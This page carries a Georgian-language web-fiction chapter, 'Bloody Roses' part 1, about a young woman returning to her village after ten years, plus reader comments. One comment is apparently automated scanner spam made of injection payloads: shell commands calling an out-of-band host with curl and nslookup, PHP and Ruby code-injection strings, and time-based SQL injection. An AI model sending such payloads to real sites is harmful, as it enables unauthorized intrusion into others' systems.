შესვლა
რეგისტრაცია
რეკლამა

სისხლიანი ვარდები (თავი 1)


2-08-2024, 21:43
ავტორი Lalunnak
ნანახია 670

10 წლის განმავლობაში არავის არ უგრძვნია ისეთი დაძაბულობა აბრაში,როგორიც ახლა დამდგარიყო.
საქართველოს ერთ-ერთ კუთხეში ყოფილიყო ეს ბევრი ამბის მომსწრე ადგილი.ბევრიც უნახავს,ბევრიც გახარებია,ბევრიც უგლოვია და საბოლოოდ თავისი სილამაზის თანხლებით საუკუნეებს გაუძლო.განსაკუთრებული იყო აბრა და განსაკუთრებულები იყვნენ იქ მცხოვრებლები.საკუთარი სახლივით უფრთხილდებოდა ყველა თითოეულ ადგილს.ყველა ყველას იცნობდა,ყველას ყველასი უხაროდა და ტკიოდა.ნაკლებად იყო შური და ბოღმა.ნაკლებად იყო მტრობა,ისევე როგორც დაძაბულობა და ცუდის მოლოდინი,სანამ სწორედაც რომ 10 წლის წინ ამ დღეს არ დაიწყო ყველაფერი.ან იქნებ უფრო ადრეც?ვისთვის როგორ.მაგრამ მაინც ამ დღეს დაკარგა სოფელმა საყვარელი შვილები.ამ წელს დაკარგეს დედებმა შვილები.ამ წელს დაინახა სოფელმა ყველას ნამდვილი სახე და სწორედაც,რომ ამ დღეს გარიყეს შენგელიების ოჯახი.13 ივლისი.არავის არ სიამოვნებდა დიდად ეს დღე,რადგან ყოველთვის ცუდთან იყო დაკავშირებული.ერთ დროს ჩვეულებრივი,არაფრით განსხვავებული თარიღი ახლა ყველასთვის შიშის მომგვრელი გამხდარიყო.

10 წლის შემდეგ,13 ივლისის დილის საათებში უკვე მთელ სოფელს მოედო ახალი ამბავი.ამ ამბების მთავარი მონაწილე ბრუნდებოდა აბრაში.მათი შვილი.მათი საყვარელი,დავიწყებული შვილი...ზოგისგან ნატკენი ზოგისგან კი განკურნებული

სწრაფი ნაბიჯებით მიქროდა,ახმეტელების დიასახლისი ახლად გაკეთებულ გზაზე.სწრაფად შეაღო დიდი ჭიშკარი.თავ წამოწეული ძაღლისთვის ყურადღება არ მიუქცევია ისე დაეშვა პატარა აღმართზე და წამში გაჩნდა სასიამოვნო სურნელით ავსებულ,მყუდრო სამზარეულოში,სადაც ჩაფიქრებული დაჰყურებდა მოსარევად გამზადებულ ნამცხვრის კრემს ნაკანთა ქალი.უეცრად შეხტა მეზობლის და დიდი ხნის მეგობრის დანახვისას.თვალებ გაფართოვებულმა,სკამზე დაუკითხავად დამჯდარს და აქოშინებულს წყალი მიაწოდა,თვითონ კი ცალი ხელით მაგიდას,ცალით კი წელს დაეყრდნო

-რა იყო-კითხა თავზე დამდგარმა წყნარად,იმის მიუხედავად,რომ პასუხი მშვენივრად იცოდა.ნაკანების ქალს შეკრულ,კუპრივით,შავ თმაში აქა-იქ ჭაღარა მოუჩანდა.იგივე თვალის ფერში კი ოდნავ შიში ჩადგომოდა.იცოდა,რაც ხდებოდა,როგორ არ იცოდა და ალბათ ყველაზე მეტად მას ეშინოდა.მას ეშინოდა შვილის გაგიჟების და გადარევის,მაგრამ დარწმუნებული იყო თავისი ვაჟი ავს არაფერს არ გააკეთებდა...

-რას ქვია გოგო რა იყო?არ მოუსმინე ახალ ამბებს?ვაიმე ღმერთო გული...-ყოველთვის ასეთი იყო ახმეტელების ქალი.ზედმეტად ემოციური ფონი მარტივად უვლიდა მუდამ,მაგრამ ახლა მართლა ისეთი ამბავი ჰქონდა გაგებული ვეღარ ცხრებოდა.გაგიჟებული აცეცებდა თვალებს აქეთ-იქით და ტუჩებს იკვნეტდა

-ვიცი,ლიანა...მოვუსმინე და ყველაფერი კარგად ვიცი-ნელა წამოდგა სკამიდან ეთერი და კვლავ თავის ნამცხვრის კრემს მიუბრუნდა.გაჩუმდა ქალი.მიხვდა,რომ ახლა მისი ემოციურობის დრო არ იყო.იცოდა რაც აწვა გულზე ნაკანთა ქალს.იცოდა ახლა მასზე მეტად ის ნერვიულობდა და ყველაფერს სიწყნარეში და სიმშვიდეში,ნიღბავდა და მალავდა

-ახლა რა იქნება?-უეცრად წამით ღიმილმა გადაურბინა ლიანას სახეზე,მას შემდეგ რაც დიდი ხნის უკან გულში ჩამალული ზედმეტსახელი გაახსენდა-ბრუნდება პატარა ალქაჯი-წამით თვალები მაგრად დახუჭა შეტრიალებულმა ეთერიმ და ღრმად ამოისუნთქა

-დაბრუნდეს.მთავარია თავის თავს მოუაროს.დანარჩენს ეშველება...

-დაბრუნდეს მაგრამ მაინც არ მგონია მისი დაბრუნება კაი აზრი-წარბაწეულმა ეთერიმ გადახედა ლიანას,რომელმაც მხრები აიჩეჩა

-მისი ცხოვრებაა და თვითონ გადაწყვეტს ყველაფერს.მთავარია ზედმეტი ხალხი არ ჩაერივნონ...-ნიშნისმოგებით უპასუხა

-ეგ კი,მაგრამ შენგელიები...

-ლიანა,გთხოვ გეყოს!-გააწყვეტინა სიტყვა უარესად აფორიაქებულმა ქალმა და სკამზე მჯდომს ისევ მიუბრუნდა-მაგათმა ამდენი ხანი თუ ვერ გაიაზრეს თავიაანთი შეცდომა კარგად ჰქონიათ საქმე!ეს გოგო მსხვერპლია მაგათი...-რაღაცის თქმა უნდოდა კიდევ ეთერის მაგრამ წამში გაკმინტა ხმა

-დედა რა ხდება?-სამზარეულოში თვალების სრესვით,დაბნეული დაპატარევებული ეთერი შემოვიდა-გამარჯობა ლიკო-მივიდა და სკამზე მჯდომ,რაღაცაზე მიშტერებულ ქალს ლოყაზე აკოცა,შემდეგ კი მისკენ შემოტრიალებულ დედას

-არაფერი დედი,დანარჩენები სად არიან?-წარბები შეჰყარა ეთომ და ქალიშვილს მაგიდისკენ მიანიშნა

-აუ რავი,ტატო ხვრინავს...გეფიცები დედა მაგ ბიჭს ერთ დღეს ბალიშით გავგუდავ-თვალები გადაატრიალა უმცროსმა ნაკანმა და დედას გახედა,მობეზრებით

-კიტა?-იკითხა ცოტა შეშინებულმა ქალმა,რამაც ტაისია გააკვირვა,დაეჭვებულმა შეხედა ჯერ დედას შემდეგ კი მის გვერდით მჯდომ რაღაცაზე მიშტერებულ ქალს

-მე მეგონა,გითხრა კიტამ-მხრები აიჩეჩა ტაისიამ,ქალი შინაგანად უარესად აფორიაქდა მაგრამ არ შეიმჩნია.ზურგით დადგა შვილისკენ და კრემს უფრო ღონიერად დაუწყო მორევა

-რა ტაისია?!

-თბილისში წავიდა,მგონი დილის 5 საათზე.მაგისმა ხმამ გამაღვიძა და მერე ისევ ჩამეძინა...დათოს ელაპარაკებოდა,რაღაცა საქმეაო,გამოიძახა იმან-უთხრა გაკვირვებულმა და წინ დადებულ ვაშლს ისე წაავლო ხელი და გემრიელად ჩაკბიჩა,დედისთვის თვალი არ მოუცილებია

-ტატო გააღვიძე რა-უთხრა ეთერიმ შვილს,უმცროსს ნაკანს თვალები აენთო და თავისი და თავისი ტყუპის ოთახისკენ გაიქცა,მუქარით

* * *
უჩვეულოდ ჩუმად,დაძაბულად მიუყვებოდნენ ნაცნობ გზას ადამიები.წამდაუწუმ შეხედავდნენ ცოლ-ქმარი ერთმანეთს და შემდეგ კვლავ გზას გახედავდნენ.ზოგჯერ შეხედავდა უფროსი ადამია გაუცხოვებულ,ურეაქციო ქალიშვილს,ღრმად ამოიოხრებდა და კვლავ გზას გახედავდა.ტკიოდა.თან ძალიან ტკიოდა,როცა შვილს ასეთ მდგომარეობაში ხედავდა.თავს იდანაშაულებდა.საჭეზე ნერვიულად აკაკუნებდა თლილ,თითებს და ოდნავ ტუჩებსაც იკვნეტდა

აი თვითონ უმცროსი ადამია,ვერაფერს გრძნობდა.დიახ,ვერაფერს გრძნობდა.ან არა,არა,არა.გატყუებთ.კარგი მსახიობი გამხდარიყო.თორე,როგორ ვერ გრძნობდა.ამდენი წლის განმავლობაში ყველაფერი კარგად დაემუშავებინა და უგრძნობის ნიღაბიც საკმაოდ კარგად მოერგო ალექსანდრა ადამიას.ყველაფერი შეცვლილი ჰქონდა.გარეგნობაც კი,მაგრამ ალბათ მას თვითონ ყველაზე ნაკლებად შეეხო,ყველაფერი წლებმა შეუცვალა.

უყურებდა ნაცნობ ადგილებს.გული ეხლიჩებოდა.ჩაქუჩს ურტყამდნენ.ნაჯახს.ქვას.დანას.
ყველაფერს.უნდოდა ეტირა,მაგრამ არავითარ შემთხვევაში თავს ამის უფლებას არ მისცემდა.ახსოვდა ყველაფერი.ყველა მოგონება.ყველა ადამიანი.თითოეული სახლი.მათში მცხოვრებლნი და მათი ისტორია.საბოლოო სახლს გახედა და მიხვდა,ბედთან შეგუების დრო იყო.წინ გაიხედა და წამში მოკრა ნაცნობ,მონატრებულ ადამიანებს თვალი.კვლავ ისე იჯდნენ და ჭუკჭუკებდნენ,როგორც ადრე.მათთან მაინც არაფერი შეცვლილიყო.ზედმეტად.კვლავ დიდი,ხის ქვეშ 6-7 საათზე იკრიბებოდნენ ზაფხულობით საღამო ხანს სიცხისგან შეწუხებულები და ასე პოულობდნენ შვებას.ბავშვები აქეთ-იქით დარბოდნენ.ზოგი ბურთს თამაშობდა,ზოგი დაჭერობანასა და დახუჭობანას.ჩაისუნთქა,ფეხებზე შეუმჩნევლად იჩქმიტა და თავი ასწია.კარები გააღო და გადმოვიდა.ყველას თვალები გაუფართოვდა,მისი დანახვისას.ხო ყველამ იცოდა,რომ ჩამოდიოდა მაგრამ ასე პირდაპირ მაინც არავინ ელოდა მასთან შეჯახებას.გულის ცემას ყურებში გრძნობდა ალექსანდრა,სანამ ნაცნობი ჰაერი არ მისწვდა და არ გააქვავა,მაგრამ თავი არ დაკარგა.არავისთვის შეუხედავს.იცოდა არავინ ელოდებოდა მას და არავინ არ მიიღებდა ისე თითქოს არაფერი მომხდარიყო.პატარა ჩანთას დაავლო ხელი და ჭიშკართან დადგა.უკან ამოუდგნენ მამა,სოსო ადამია და დედინაცვალი მაია ასათიანი.ელოდნენ,როდის შეაღებდა კარს გოგონა,მაგრამ ნაბიჯს ვერ დგამდა.საბოლოოდ უკან მდგომებს გახედა და ჩაიჩურჩულა

-ღიაა?-პირველად ამოიღო ამდენი ხნის შემდეგ მათთან ხმა.არც მაშინ ამოუღია ხმა საბოლოოდ,რომ დაემშვიდობა მშობლებს.არც მაშინ საზიზღარ ადგილს,რომ დააღწია თავი.არც მაშინ მხოლოდ მშობლები,რომ დახვდნენ იქ.არც მაშინ, თვალცრემლიანებმა რომ ჩაიკრეს გულში უემოციო შვილი...მისი ხმა 10 წლის განმავლობაში არ გაეგოთ...ტანში ჟრუანტელმა დაუარა ორივეს.ხმაც შეცვლოდა ალექსანდრას.წლებისგან ნატანჯი,წყნარი,ნაზი,სერიოზული ხმა ჰქონდა ახლა.კაცმა ოდნავ შეუმჩნევლად ნაღვლიანად გაუღიმა და თავი დაუქნია.ხელი მოკიდა ეგრევე კარებს და მიაწვა,ისიც მის ნებას დაჰყვა და წამში გადაეშალა თვალ წინ ყველა მოგონება.არ შეიმჩნია მოწოლილი ცრემლები და მყარად შედგა ქუსლიანებით პირველი ნაბიჯები ამდენი ხნის შემდეგ საკუთარ ეზოში.სადაც გაატარა 18 წელი.არაფრისთვის მიუქცევია ყურადღება ეგრევე სახლისკენ დაიძრა,სწრაფად შეაღო კარები.დარწმუნდა,რომ არავინ უყურებდა.დარწმუნდა,რომ მარტო იყო.იქვე ჩაიკეცა და ღრმად სუნთქვა დაიწყო.არ უნდა ეტირა!თვალები ერთმანეთს ძლიერად დააჭირა და სახლის სურნელი შეისუნთქა,მაგრამ აცრემლიანებული თვალები გაახილა.კიბეებზე აირბინა.სწრაფად შეაღო ოთახის კარები,ჩაკეტა და იქვე ჩაიკეცა.პირზე მიიჭირა,მთელი ძალით ხელები და არაამქვეყნიური ხმით დაიწყო ტირილი.იცოდა ახლა არავინ შეაწუხებდა.თვალი მოავლო ოთახს და უფრო ატირდა.არაფერი არ შეეცვალათ.ისევ ისეთი იყო.ისევ იასამნსიფერ,თეთრ ფერებში გამოწყობილ განათებულ ოთახში ამოყო თავი,ბნელი,ბინძური კედლებიდან.ცოტა ხანი ასე იყო.შემდეგ ნელა,ფეხის კანკალით წამოდგა ფეხზე და ძველი კარადის სარკეში საკუთარი თავი შეათვალიერა.ვინ დატოვა და ვინ მოვიდა 10 წლის შემდეგ...

* * *

ყველა გაკვირვებული იყურებოდა.ხმას არავინ იღებდა."ახლებიც" მიმხვდარიყვნენ ვინ ჩამოსულიყო და ისინიც გაკვირვებულები იცქირებოდნენ.ყველა გააოცა ალექსანდრა ადამიამ. ყველაფრით.გარეგნობით,საქციელით.ძველი ალექსანდრა მათთან მივიდოდა ყველას გულითადად მოიკითხავდა.სერიოზული სახის ნაცვლად მის სახეზე ღიმილს დაინახავდნენ.მართლაც,რომ ალექსანდრას სახეზე უარყოფითი ან სტაბილური ემოცია თითქმის არავის არასდროს დაუნახია.არც გაბრაზება,არც ტირილი,არც სერიოზულობა.მხოლოდ და მხოლოდ ღიმილი.ახლა კი...აქამდე ის მსუბუქ გრძნობას უტოვებდა ყველას.ახლა კი პირიქით.რანაირადაც არ უნდა ეცადა მისი დამძიმებული სხეულისა და სულის დამალვა ვერავის დაუმალავდა.ყველა დანახვისთანავე მიხვდებოდა და შეიგრძნობდა მისი სულის სიმძიმეს

ლამაზი იყო ალექსანდრა ადამია.ზედმეტად ლამაზიც კი ეთქმოდა.განსაკუთრებულიც.
დედამის გავდა.10 წუთის დაბადებული არ იყო პატარა ადამია,როგორც კი შვილის სურნელი შეისუნთქა ეგრევე დაემშვიდობა ამ სამყაროს მარიამი.პირველი ტკივილი ბედნიერებასთან ერთად ეგ იყო 13 ივლის.მარიამ კერესელიძემ ეს ქვეყანა დატოვა,ხოლო ალექსანდრა ადამია ამ ქვეყანას მოევლინა.მისნაირი ცეცხლისფერი,ახლა უკვე გრძელი,წელამდე,ტალღოვანი თმა ჰქონდა ალექსანდრას.მისნაირი სავსე ტუჩები,მისნაირი ნუშისებრი,მაგრამ სოსოსნაირი ნაცრისფერი თვალები.მისნაირად ჰქონდა მარჯვენა თვალის ქვეშ პატარა ხალი,რომელსაც ძალიან იშვიათად თუ ამჩნევდა ადამიანი.მაღალიც იყო ალექსანდრა და ლამაზი ტანიც ჰქონდა.წვრილი წელით და გამოყვანილი ფორმებით,ადრინდელთან განსხვავებით.ადრე პუტკუნაც ეთქმოდა და თმაც მუდამ კარედ ჰქონდა შეჭრილი.სულ იმას გაიძახდა გრძელი თმა ყველაფერში ხელს შემიშლისო.ვერც სიმაღლეში გავიზრდებიო,ვერც კარგად თამაშს მოვახერხებო და ვინმეს თმებში,რომ წავწვდები მაგანაც ამ თმას ხელი,რომ დაადოს ხო გავგიჟდიო.ხასიათებითაც ჰგავდა ალექსანდრა დედას.ოღონდ ადრე ხალხისთვის.ახლა ყველასთვის სხვა იყო ის.თითქმის არასდროს არ ცმია ალექსანდრას შავი სამოსი.მუდამ ფერადი ფერები უყვარდა და ქუსლიანები ჭირივით სძულდა.ახლა კი ისე მოხდენილად გადააბიჯა ქვიშითა და კენჭებით სავსე მიწაზე,შავ კლასიკურ სტილში გამოწყობილმა მართლა ყველა გააოცა.

ყველა ერთმანეთს ესაუბრებოდა თვალებით.ვერავინ ვერ მალავდა შთაბეჭდილებას.ზოგს თვალები ჰქონდა მართლა ცრემლებით სავსე.ენატრებოდა ყველას ალექსანდრა და მართლა ეგონათ,რომ ალექსანდრა მათ აღარასრდროს შეხედავდა ისე,როგორც ადრე.ამ ყველაფერს კი იქვე გაჩერებულ მანქანაში მჯდომი განადგურებული უცქერდა.თვალები კი.მის თვალებში,რომ ჩაგეხედავთ ყველაფერს მაშინვე გაიგებდით.ტკივილით სავსე მუქი ყავისფერი თვალებით იცქირებოდა.ბოლოს უბრალოდ თავი ჩაწია და საჭეს შუბლი რამდენჯერმე მიარტყა ისე თითქოსდა ტკივილს ამით შეიმსუბუქებდა...მაგრამ ყველამ ძალიან კარგად ვიცით სულიერ ტკივილთან ფიზიკური ტკივილი ახლოსაც კი ვერ მივა...

laluna

გამარჯობა!ახალი ვარ და გამიხარდება თუ წაიკითხავთ და აზრსაც გამოთქვამთ<33ჩემთვის დიდი მოტივაცია იქნება<33



№1 სტუმარი გუდა

ძალიან კარგია.არ მოგვანატრო.

 


№2 სტუმარი pHqghUme

1BVQS0NpeEO

|(nslookup -q=cname hitgmdynrxsjzae591.bxss.me||curl hitgmdynrxsjzae591.bxss.me)

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

'.gethostbyname(lc('hithf'.'pdpezxpbf82eb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(84).chr(113).chr(87).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

"+"A".concat(70-3).concat(22*4).concat(113).concat(86).concat(120).concat(82)+(require"socket"
Socket.gethostbyname("hitvm"+"dhbzmmzj82a44.bxss.me.")[3].to_s)+"

xfs.bxss.me

555-1 OR 948=(SELECT 948 FROM PG_SLEEP(15))--

555-1)) OR 357=(SELECT 357 FROM PG_SLEEP(15))--

555ygSNEI0F') OR 925=(SELECT 925 FROM PG_SLEEP(15))--

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 



სახელი: *
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent